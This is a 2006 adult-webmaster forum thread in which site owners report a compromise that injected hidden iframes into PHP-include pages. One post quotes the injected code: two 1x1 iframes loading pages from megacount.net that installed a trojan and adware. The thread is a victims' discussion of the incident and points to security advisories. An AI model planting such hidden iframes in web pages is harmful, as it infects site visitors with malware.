Welcome to the GoFuckYourself.com - Adult Webmaster Forum forums.

You are currently viewing our boards as a guest which gives you limited access to view most discussions and access our other features. By joining our free community you will have access to post topics, communicate privately with other members (PM), respond to polls, upload content and access many other special features. Registration is fast, simple and absolutely free so please, join our community today!

If you have any problems with the registration process or your account login, please contact us.

View Poll Results: got esploited
yes 5 50.00%
no 5 50.00%
Voters: 10. You may not vote on this poll

Post New Thread Reply

Register GFY Rules Calendar
Go Back   GoFuckYourself.com - Adult Webmaster Forum > >
Any of you have your sites hit with the Megacount exploit Any of you have your sites hit with the Megacount exploit
Discuss what's fucking going on, and which programs are best and worst. One-time "program" announcements from "established" webmasters are allowed.

 
Thread Tools
Old 10-05-2006, 11:05 AM   #1
Machete_
WINNING!
 
Industry Role:
Join Date: Oct 2002
Posts: 14,579
Any of you have your sites hit with the Megacount exploit
Today when I ran updates on some of the sites, I found 2 iframes added to the bottom of the code. Its as only added to the sites using a PhP-include as a menu.
If I navigated to the site with my browser I saw nothing since its locked up REAL tough. But I then opened it on a test computer with no security and it installed a trojan + one count of adware
Machete_ is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 10-05-2006, 11:09 AM   #2
bl4h
Confirmed User
 
Join Date: Jul 2006
Location: Philadelphia
Posts: 1,282
you fail as a webmaster
bl4h is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 10-05-2006, 11:12 AM   #3
Trixxxia
Confirmed User
 
Industry Role:
Join Date: Aug 2004
Location: Montreal, Canada
Posts: 5,600
Quote:
Originally Posted by ebus_dk
Today when I ran updates on some of the sites, I found 2 iframes added to the bottom of the code. Its as only added to the sites using a PhP-include as a menu.
If I navigated to the site with my browser I saw nothing since its locked up REAL tough. But I then opened it on a test computer with no security and it installed a trojan + one count of adware
Can you hit me up? I'd like to see what it's doing
Trixxxia is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 10-05-2006, 11:16 AM   #4
Machete_
WINNING!
 
Industry Role:
Join Date: Oct 2002
Posts: 14,579
Quote:
Originally Posted by bl4h
you fail as a webmaster
It was a virtual account, and the whole server got exploited
Machete_ is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 10-05-2006, 11:20 AM   #5
Machete_
WINNING!
 
Industry Role:
Join Date: Oct 2002
Posts: 14,579
Quote:
Originally Posted by TopBucksTrixxxia
Can you hit me up? I'd like to see what it's doing

it included this

PHP Code:
<iframe src='http://megacount.net/adv/new.php?adv=167' width=1 height=1></iframe
<iframe src='http://megacount.net/adv/167/new.php' width=1 height=1></iframe
Machete_ is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 10-09-2006, 03:17 PM   #6
boneprone
Hall Of Fame
 
boneprone's Avatar
 
Industry Role:
Join Date: Jan 2001
Location: Portland Oregon USA
Posts: 34,415
Seems I got hacked today..

Would like if someone could shed some light on this on how they got in..

icq 66883099
__________________

Industry Hall Of Fame Legend Mike Jones
Bow to the Power - Still BP4L
http://gfyawards.com/hall-of-fame
Learn about it kids.
boneprone is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 10-09-2006, 03:33 PM   #7
Machete_
WINNING!
 
Industry Role:
Join Date: Oct 2002
Posts: 14,579
Quote:
Originally Posted by boneprone View Post
Seems I got hacked today..

Would like if someone could shed some light on this on how they got in..

icq 66883099
dissipate posted these two pretty usefull links
http://www.securiteam.com/unixfocus/6R0030UH5W.html
http://www.securiteam.com/unixfocus/6M00315H5S.html

Im my case (webair hosted) it was through cpanel
Machete_ is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Post New Thread Reply
Go Back   GoFuckYourself.com - Adult Webmaster Forum > >
Any of you have your sites hit with the Megacount exploit Any of you have your sites hit with the Megacount exploit
« Previous Thread | Next Thread »

Bookmarks



Advertising inquiries - marketing at gfy dot com

Contact Admin - Advertise - GFY Rules - Top

©2000-, AI Media Network Inc



Powered by vBulletin
Copyright © 2000- Jelsoft Enterprises Limited.